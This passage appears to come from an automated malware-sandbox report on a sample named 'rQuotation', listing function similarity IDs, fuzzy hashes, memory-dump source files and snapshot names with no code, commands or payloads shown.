                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eaf7a09b8b72a4954b82bf4ec6dc308a4494e544c9b8f65a419a8654a40680a3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F371BA75C002699BCB258F58C890BBEFBF1FF58710F15811EE942AB350E7319846CBA0
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d1c152fb15c957b9e4e2f77919e25dbb644e7675aeee9331e8aec0b6c002c146
                                                                                                                                                                                                                                                • Instruction ID: c29d98b564003bbfd4187c84709255e83c9537bc809044564d418d1a6f790fc2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d1c152fb15c957b9e4e2f77919e25dbb644e7675aeee9331e8aec0b6c002c146
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 58718F71A00205EFDF20DF59D988F9AFBF9EB84710F05816AF711A7259D7319A80CB64
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2021778481.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_840000_rQuotation.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 9ec176aae16447939ca2fc19b608d5b296f5b944825ed44ac2b00e0444c9d4ab
                                                                                                                                                                                                                                                • Instruction ID: b7c47cc7d5cd1d9a0d1a48c80f2f7133691f708c02e55bb0283c369214260299
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ec176aae16447939ca2fc19b608d5b296f5b944825ed44ac2b00e0444c9d4ab
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2951C132B0451E4BDB688E1CCC90269B3A5FBD8315F99827AEC19CB791E634ED518BC0
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: a6a5ed214f73ed92db8dcd21ec96af8f566ebab40b5edf3af2aae06b9edf3bac
                                                                                                                                                                                                                                                • Instruction ID: e76680977adb0ef22bd3a99a3769eb171864ccee89f81d8baf6fdaaf7651244f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a6a5ed214f73ed92db8dcd21ec96af8f566ebab40b5edf3af2aae06b9edf3bac
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9671C235A046528FD721DF28C894B2AB7E5FF84310F0585AEE899CB352DB34D846CBA1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: be6d1634e3b9454c9f03858284b49d0c957ec2c745ed519b6a5d78d1a3954909
                                                                                                                                                                                                                                                • Instruction ID: 3a54a6498b3498793d4632adfc73b7935dab4d4a3541b1e02232d0bfaec9510e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be6d1634e3b9454c9f03858284b49d0c957ec2c745ed519b6a5d78d1a3954909
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C161E871E402179BDB19FFA9C895ABFF77AAF94210F20442DE913A7640EB34D9418B90
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: fde162cb99a79c80b022b4fd86e053551224983d7ee9993ffec0ae5869f8a9c5
                                                                                                                                                                                                                                                • Instruction ID: cc519f9b9a68f239eafda4e49bcb441df07d7f42cd51b8e5a402a191e3f2651d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fde162cb99a79c80b022b4fd86e053551224983d7ee9993ffec0ae5869f8a9c5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC71AB78A05622DBDF24CF59D28067EF7F1BF45318F64846ED9A297640D770E980CB90
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                                                                                                                                • Instruction ID: 8b088c0e2bcb39bf3db5b7915e16a946dbda95b99043f15e572b19a47df37213
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3713A71E0061AAFDB10DFA9C984EEEFBB9FF48700F144569E605A7250DB34EA41CB94
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 578b20d9ea5dcec282b74602b6529db03f9d0bd0774170c8c0ef04423bd187cc
                                                                                                                                                                                                                                                • Instruction ID: 492fd14bcac0369b68e300eb7041b5f6447d9a5844212ce13815c0381e7d552f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 578b20d9ea5dcec282b74602b6529db03f9d0bd0774170c8c0ef04423bd187cc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A71E032200B01EFE7629F18C848F56FBF6EB44720F544518FA168B2A1DBB5E944CB50
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 880c45aaa2b8abf980a7aa97f1095fec0f6a4e6c462e9b93256d2bffb3ae83fd
                                                                                                                                                                                                                                                • Instruction ID: 0ae93b8c11f6f09eddca87940d4ddbf65cada09a5413a733f9ff50a8e31829ce
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 880c45aaa2b8abf980a7aa97f1095fec0f6a4e6c462e9b93256d2bffb3ae83fd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8481A172A083168FDB24CF98D884BADB7F5FB48720F1A412DD9026B286C775DD42CB94
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2021778481.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_840000_rQuotation.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2021778481.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_840000_rQuotation.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2021778481.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_840000_rQuotation.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                                                                                                                                • Instruction ID: a8a4651ab03348671ed3978807257fac1b1baa29215808545e95923c07be96ef
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EC51BE71E0121AABDF15DFA8C844BFEBBF5AF45344F044269EA01EB240DB34D945CBA4
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 89e302de72bf5c6a1f75b9fe4a7e4492fe3ad831b02f4956a6ed6e8a2598af5c
                                                                                                                                                                                                                                                • Instruction ID: b76b6210e801e709dc057f2f3024fc0b71fba93d972059e44abe388ddbe4c8f1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 89e302de72bf5c6a1f75b9fe4a7e4492fe3ad831b02f4956a6ed6e8a2598af5c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF51E270A00216EBDB24DF99C880ABEB7B5FF85700F94419DE945DB781E734E950CB91
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                                                                                                                                                • Instruction ID: f5aa4c81c91808e73facb201adf009e25e45c49bbab2ae5ac1de31710f85d640
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40517771D0061AEFEF21DB94C898FAEFB79BB01374F154669D91267290DB389E40C7A0
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 6566964971a4b1aeb1743ea81398f7a3a4da63388f6c39f5809327b8f8d1d557
                                                                                                                                                                                                                                                • Instruction ID: 9667cdc663f8e51f93fda3b866dad6b341e5cf8467a5c6e74e6fd7c368b55360
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6566964971a4b1aeb1743ea81398f7a3a4da63388f6c39f5809327b8f8d1d557
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D510531B4011A9BDB19EF68C884B6EFBB9FF48354F248169E913E7244DB70AD11CB90
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: f67591f1f8071f3b1f62b2d35d97f619691dab67d2d554c5e386f0caf25cf5ce
                                                                                                                                                                                                                                                • Instruction ID: cbd313a921d5e4bcdf6a69f4266a730c5d1ef796a215fdfc5d823696da7a9637
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f67591f1f8071f3b1f62b2d35d97f619691dab67d2d554c5e386f0caf25cf5ce
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A4106707856019BEB29FB2DC994B7BFB9AEFD0360F448259F91587388DB30D801C692
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 756ba3dd81c63127049640b8fc51de3ef2062117add0597f92fbe15421928b68
                                                                                                                                                                                                                                                • Instruction ID: f693075674151c559a2894d9ce5183a2613e60e7ec0adb68f71d9f5c21df6eef
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 756ba3dd81c63127049640b8fc51de3ef2062117add0597f92fbe15421928b68
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA517D75A01216DFCB21DFA9C980EAEFBB9FF48358B518529E645A3304D730AD41CF94
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                                                                                                                                                • Instruction ID: 4108cc54daa75496b81344284b34bc54c67709732bb592c394bf8126f68e7dab
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7411971A417069FDB25EF28C984A6AF7E9FF80210B04466FE91287640EB30EE14C7D1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 537fcca56011c14effd759b7a08c13a2d0a341200a94395c9959b32ebc2480e2
                                                                                                                                                                                                                                                • Instruction ID: 8deb91eaa10cfbc1f84bd0a05c0b79cedf5ec5ac02bcf23559e8e56461a84357
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 537fcca56011c14effd759b7a08c13a2d0a341200a94395c9959b32ebc2480e2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB41AD3A9002169BDB14DFA8C840AEEF7B6FF48610F14816EFA15E7342D7359D41CBA8
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 4c295b7f5015cc0267911ce53e58bab4ce1be0ab0baad048519c5ba86298a0f5
                                                                                                                                                                                                                                                • Instruction ID: 4db470183e97412f777163afc3ba990fae5732573a4c52464d429b6a14b9048f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c295b7f5015cc0267911ce53e58bab4ce1be0ab0baad048519c5ba86298a0f5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 75413C759083069ED712EF69CC80AABF6E9EF84B54F40092EF984D7250E730DE458B97
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                                                                                                                                                • Instruction ID: 5fe3f77a5157ad8ae02795c0054cd19408a894d57543e27cabc99c9c2e66c38a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F412A31A00212DBDB21DEAD88C07FAFB76EB50759F15806AE9459B245D7338EC1CB91
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 7a1a20b7d55a7de6409c63281bad642c811a846f8cdada85670461300cf73d03
                                                                                                                                                                                                                                                • Instruction ID: 22d86f991e569f2f4ab6e138ce4013282f47644e55c115ef7e59b576fec11539
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a1a20b7d55a7de6409c63281bad642c811a846f8cdada85670461300cf73d03
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BA416571A00601EFD321DF58C840B26BBE5FF58B14F208A6EE8498B252E771E9428B94
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                                                                                                                                                • Instruction ID: b78cc60438c0ffe859d7683b4a29341b412603f5467086f64ad9bcc1710e5add
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E412C75A00705EFDB24CF98C980AAABBFAFF18700B10496DE656D7652D330EA45CF50
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d95a7e61363990435fb52cd3523acf471ac48a1eea06d46c9efe60805f437062
                                                                                                                                                                                                                                                • Instruction ID: e15b8f1f641b1332cb24934259778136a48c67050569e61bf183d8960ffcbfaf
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d95a7e61363990435fb52cd3523acf471ac48a1eea06d46c9efe60805f437062
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C5418EB1901705CFCB22EF29CD90B75B7B2FF58B10F1482ADD9169B2A5DB309941CB61
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 6cb685ca209c4a7b3fd637c65fe883cf22c34d020a1367fcf88b1afa2c00b55c
                                                                                                                                                                                                                                                • Instruction ID: c7c8ed425f9e6b57b82bc88ad1ab0ecdeae942b2e640f14ae1597ef36e9b5ec3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6cb685ca209c4a7b3fd637c65fe883cf22c34d020a1367fcf88b1afa2c00b55c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D318BB2A00349DFDB12CF58D440B99BBF1FB49724F2085AEE519EB251D3329906CF94
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d6dde422be6242b5dc780ea29c6f68450db6823a9162e3c4a097e72521c401a4
                                                                                                                                                                                                                                                • Instruction ID: cf37f787d30b791d4f21a97cf3645a9304755257f17a94ff4021c5a80f1d66e0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d6dde422be6242b5dc780ea29c6f68450db6823a9162e3c4a097e72521c401a4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66415C725043059FD720DF29C885F9BFBE8FF88664F108A2EFA9897251D7709944CB92
                                                                                                                                                                                                                                                Memory Dump Source
